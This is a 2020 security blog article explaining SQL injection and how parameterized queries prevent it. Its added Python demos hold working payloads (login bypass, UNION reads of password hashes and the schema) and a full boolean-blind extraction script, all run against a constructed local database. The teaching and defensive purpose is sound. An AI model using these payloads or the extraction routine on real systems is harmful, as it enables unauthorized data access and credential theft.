Fixing SQL Injection: ORM is not enough

SQL Injection (SQLi) Attack

Website security is a top concern of businesses, security analysts, and users. Why? Everyone wants to feel that submitting a financial balance transfer or reviewing their medical records is safe and protected from unauthorized access by hackers and cybercriminals.

Unfortunately, that’s not always the case, as the Open Web Application Security Project (OWASP) has indicated by placing injection at the top of its Top 10 list of application security risks. Injection – including SQL injection – can cause many problems for businesses and consumers alike, such as:

  • Loss, exposure, or corruption of data in databases
  • Website defacement or manipulation
  • Embedding of malicious code in the application

In 2019 the number of new SQL injection vulnerabilities in the Java ecosystem fell, while PHP showed the opposite trend.

[Figure: SQL injection vulnerabilities by year. Source: State of Open Source Security Report 2020 by Snyk]

While the overall number of new SQL injection vulnerabilities in 2019 was low, a single one can be very impactful. It is therefore critical to understand what SQL injection is and how it works. Let’s find out more.

What is SQL Injection?

SQL Injection – sometimes referred to simply as SQLi – is a common technique attackers use to read or manipulate database content that the application would not otherwise display or provide to the website user.

It works by exploiting a flaw in how the application builds its queries: attacker-controlled input is interpreted as SQL code, altering the query so that it retrieves, modifies or even deletes data to which the logged-in user has never been granted access.

What are SQL Queries?

SQL (Structured Query Language) is used to interact with a database through common statements such as SELECT, INSERT, UPDATE and DELETE. Most popular database products (Oracle, Access, Microsoft SQL Server and others) accept SQL, although each adds proprietary functions and syntax of its own.

SQL queries are SQL commands that specify the database action to be taken, the content to be included, and the filters to be applied. A simple example is:

SELECT * FROM PAYROLL
WHERE status='active'
ORDER BY State, City

This command selects all records from a table named PAYROLL where the employee status is active and sorts the results by State, then City.

Using SQL injection techniques, an attacker can alter the query to remove the ‘active’ criterion and obtain every employee in the PAYROLL table, or worse: where the database driver accepts stacked statements, append a DELETE that wipes the data out.

What is an SQL Injection Attack?

Attackers launching an SQL injection attack simply modify an existing SQL command to suit their needs. Many web applications use SQL statements for everything from listing customers to checking visitors’ usernames and passwords against a server-side database.

By altering a SQL command to remove restrictions, such as a filter for only active employees or for the department the user is allowed to see, an SQL injection attack can return information about all employees. This can reveal personal information that should have been restricted.

SQL commands are very powerful functions in web applications, used for data retrieval, validation, and storage on server databases. With all the capabilities of SQL at their disposal, attackers leverage injection flaws to steal and corrupt data and even plant malicious content or commands in server databases.

What are the types of SQL Injections?

Hackers are very creative in utilizing the potential of SQL injection. When a website proves to be vulnerable to SQL injection attacks, the attacker will take advantage in any number of ways:

Manipulating Web Application Logic

Modifying the SQL command so that it performs an entirely different function from the one the developer intended. Consider a login routine that validates a username and password against a server database. By removing the password-matching condition from the SQL command, the attacker can log into the application without knowing a password.

Retrieving Hidden or Unauthorized Data

By removing filters or adding fields to the query, the attacker changes the result set to their benefit.

For example, rows the application never intended to expose can be returned to the attacker. Modifying the requested fields can cause other columns to be returned, whether or not the user has the right to view that information.

UNION Injection Attacks

A UNION injection attack appends a second SELECT to the application’s query, so that its rows are returned alongside the legitimate results. Because UNION requires both queries to return the same number of columns, the attacker first works out that count, after which they can read data from entirely different tables than the developer intended.

Database Examination/Extraction

This type of SQL injection attack lets the perpetrator obtain information about the database type and structure, which is useful for further manipulation or data extraction. For example, on databases that implement the standard catalog views:

SELECT * FROM information_schema.tables

This query lists the database’s tables; the companion view information_schema.columns lists each table’s columns and types. Together they give the attacker a map of the schema, very useful for further exploitation of or damage to tables and their content.
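The three techniques above (rewriting the query logic, a UNION against another table, and enumerating the schema) can be seen working against one deliberately vulnerable function. The following is an added example written for this page, not code from the original article; it uses Python’s built-in sqlite3 module with a constructed in-memory database, and since SQLite has no information_schema, it queries the equivalent catalog table sqlite_master instead. The table and column names (payroll, users, password_hash) are invented for the demonstration.

```python
import sqlite3


def build_db():
    """Constructed sample database for the demonstration (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE payroll (name TEXT, status TEXT, salary INTEGER);
        INSERT INTO payroll VALUES ('alice', 'active', 90000);
        INSERT INTO payroll VALUES ('bob', 'terminated', 85000);
        CREATE TABLE users (username TEXT, password_hash TEXT);
        INSERT INTO users VALUES ('admin', 'a1b2c3');
        INSERT INTO users VALUES ('alice', 'd4e5f6');
    """)
    return conn


def search_active(conn, name_fragment):
    """VULNERABLE: the browser-supplied fragment is concatenated into the query text."""
    sql = ("SELECT name, status, salary FROM payroll "
           "WHERE status='active' AND name LIKE '%" + name_fragment + "%'")
    return conn.execute(sql).fetchall()


def login(conn, username, password_hash):
    """VULNERABLE: a login check built the same way."""
    sql = ("SELECT COUNT(*) FROM users WHERE username='" + username +
           "' AND password_hash='" + password_hash + "'")
    return conn.execute(sql).fetchone()[0] > 0


# Payloads. Each one closes the string literal the application opened;
# "--" turns whatever the application appends afterwards into a comment.
DROP_FILTER = "%' OR 1=1 --"          # the status='active' restriction no longer applies
LOGIN_BYPASS = "' OR '1'='1"          # supplied as the password: no password needed
UNION_USERS = "%' UNION SELECT username, password_hash, 0 FROM users --"
# sqlite_master is SQLite's equivalent of information_schema.tables.
UNION_SCHEMA = "%' UNION SELECT name, type, 0 FROM sqlite_master WHERE type='table' --"


def demo():
    """Run each payload against the vulnerable functions and collect the results."""
    conn = build_db()
    return {
        "normal": search_active(conn, "ali"),              # what the developer expected
        "all_employees": search_active(conn, DROP_FILTER),  # terminated staff leak too
        "login_bypass": login(conn, "admin", LOGIN_BYPASS),  # True without a password
        "other_table": search_active(conn, UNION_USERS),    # rows from users, not payroll
        "schema": search_active(conn, UNION_SCHEMA),        # table names from the catalog
    }


if __name__ == "__main__":
    for label, result in demo().items():
        print(label, result)
```

Note that the UNION payloads pad their SELECT with a literal 0 so that both queries return three columns; a mismatch would be a syntax error rather than a leak.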

Blind SQL Injection

In a blind SQL injection attack the application never shows the attacker the query’s results or its error messages. Instead the attacker asks the database yes/no questions and infers the answers from side effects: a page that renders differently when an injected condition is true or false (boolean-based), or a response that arrives late because the injected SQL introduced a delay (time-based).

Blind SQL injection can therefore still be used to extract unauthorized data, but the technique is slower and more involved than the other methods, since each probe leaks only one bit. Numerous tools exist to automate this process and make it easy for attackers.
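To make the one-bit-per-probe idea concrete, here is an added example, written for this page and not taken from the original article, of boolean-based blind extraction against a constructed SQLite database. The endpoint only reports whether a username exists, yet the attacker recovers the admin’s stored key by binary-searching each character’s code point; the table, columns, and printable-ASCII range of the value are all assumptions of the demo.

```python
import sqlite3


def build_db():
    """Constructed sample database (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (username TEXT, api_key TEXT);
        INSERT INTO users VALUES ('admin', 'k3y-9f2a');
        INSERT INTO users VALUES ('alice', 'k3y-0b71');
    """)
    return conn


def username_taken(conn, username):
    """VULNERABLE 'blind' endpoint: leaks nothing but a yes/no answer."""
    sql = "SELECT COUNT(*) FROM users WHERE username='" + username + "'"
    return conn.execute(sql).fetchone()[0] > 0


def ask(oracle, victim, condition):
    """One probe: close the literal, AND in our condition, comment out the rest."""
    return oracle(victim + "' AND " + condition + " --")


def extract_api_key(oracle, victim, max_len=64):
    """Recover users.api_key for `victim` one character at a time.

    Each character is found by binary search over the printable ASCII range
    (an assumption of this demo), so about 7 yes/no probes leak one character.
    Returns (recovered_string, number_of_probes_sent).
    """
    recovered, probes = "", 0
    for pos in range(1, max_len + 1):
        probes += 1
        if not ask(oracle, victim, f"LENGTH(api_key) >= {pos}"):
            break                                   # ran past the end of the value
        lo, hi = 32, 126                            # code point must lie in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            probes += 1
            if ask(oracle, victim, f"UNICODE(SUBSTR(api_key, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered, probes


if __name__ == "__main__":
    conn = build_db()
    key, n = extract_api_key(lambda u: username_taken(conn, u), "admin")
    print(f"recovered {key!r} with {n} yes/no probes")
```

Time-based blind injection follows the same loop; only the oracle changes, measuring whether a response was delayed instead of reading a true/false page difference.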

How and Why are SQL Injections Performed?

SQL injection is one of the most common methods of extracting unauthorized data from commercial websites. Much of that data ends up in the hands of cyber thieves, who use it for identity theft or to extort the affected businesses.

Ransomware attacks could also begin with an SQL injection that plants malicious content or commands in a database without detection.

How to Prevent SQL Injection?

When building SQL commands, validate any browser-supplied input values that will be used in the query, and use DAST and SAST tools to detect places where they are not.

Implement a web application firewall (WAF) that can detect and filter out SQL injection attempts (along with other attack traffic). Such firewalls block known malicious patterns using continuously updated signature lists, which makes them a useful layer of defense in depth but not a substitute for fixing the code: novel or obfuscated payloads can slip past signatures.

The most effective method of preventing SQL injection is to build queries in a controlled way, with parameters. This method, referred to as parameterized queries or prepared statements, uses a fixed query text with the filter values supplied separately as parameters, so user input is never spliced into the SQL itself.

Implementing an intrusion detection system can help spot user behavior that attempts to exploit vulnerabilities in applications.

Applying best practices in web application development and making SQL injection testing an integrated step of development will provide better protection from SQL injection vulnerabilities. Automating static (SAST) and dynamic (DAST) analysis tools in the development pipeline is an effective way to add this level of testing.
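The fix in practice, as an added example written for this page rather than code from the original article: the same PAYROLL-style search implemented first by string concatenation and then as a prepared statement with a bound parameter, using Python’s sqlite3 module on a constructed table. The same rule applies to the raw-SQL escape hatches that ORMs expose. Two details a practitioner needs are also shown: LIKE wildcards in the input are escaped (parameters stop injection, not wildcard semantics), and the ORDER BY column, which cannot be bound as a parameter, is checked against an allow-list. Table and column names are invented for the demo.

```python
import sqlite3


def build_db():
    """Constructed sample table (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE payroll (name TEXT, status TEXT, state TEXT, city TEXT);
        INSERT INTO payroll VALUES ('alice', 'active', 'WA', 'Seattle');
        INSERT INTO payroll VALUES ('bob', 'terminated', 'OR', 'Portland');
        INSERT INTO payroll VALUES ('carol', 'active', 'CA', 'Oakland');
    """)
    return conn


def search_unsafe(conn, name_fragment):
    """BEFORE: string concatenation; the input can rewrite the query."""
    sql = ("SELECT name FROM payroll WHERE status='active' "
           "AND name LIKE '%" + name_fragment + "%'")
    return [row[0] for row in conn.execute(sql)]


def escape_like(text):
    """Parameters stop injection but not LIKE wildcards; neutralise % and _ too."""
    return text.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


ALLOWED_SORT_COLUMNS = {"name", "state", "city"}


def search_safe(conn, name_fragment, order_by="name"):
    """AFTER: a prepared statement with a bound parameter.

    The query text is fixed; the driver passes the value separately, so a quote
    inside name_fragment is just a character to match, never SQL syntax.
    Identifiers (the ORDER BY column) cannot be bound, so they are checked
    against a fixed allow-list instead of being interpolated from input.
    """
    if order_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unexpected sort column: {order_by!r}")
    sql = ("SELECT name FROM payroll WHERE status='active' "
           f"AND name LIKE ? ESCAPE '\\' ORDER BY {order_by}")
    pattern = "%" + escape_like(name_fragment) + "%"
    return [row[0] for row in conn.execute(sql, (pattern,))]


if __name__ == "__main__":
    conn = build_db()
    payload = "%' OR 1=1 --"
    print("unsafe:", search_unsafe(conn, payload))   # every employee, filter gone
    print("safe:  ", search_safe(conn, payload))     # nobody is literally named that
```

With the parameterized version the injection payload is simply a string that no employee’s name contains, so the active-only filter keeps doing its job.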

July 9, 2020 | By Alyssa Miller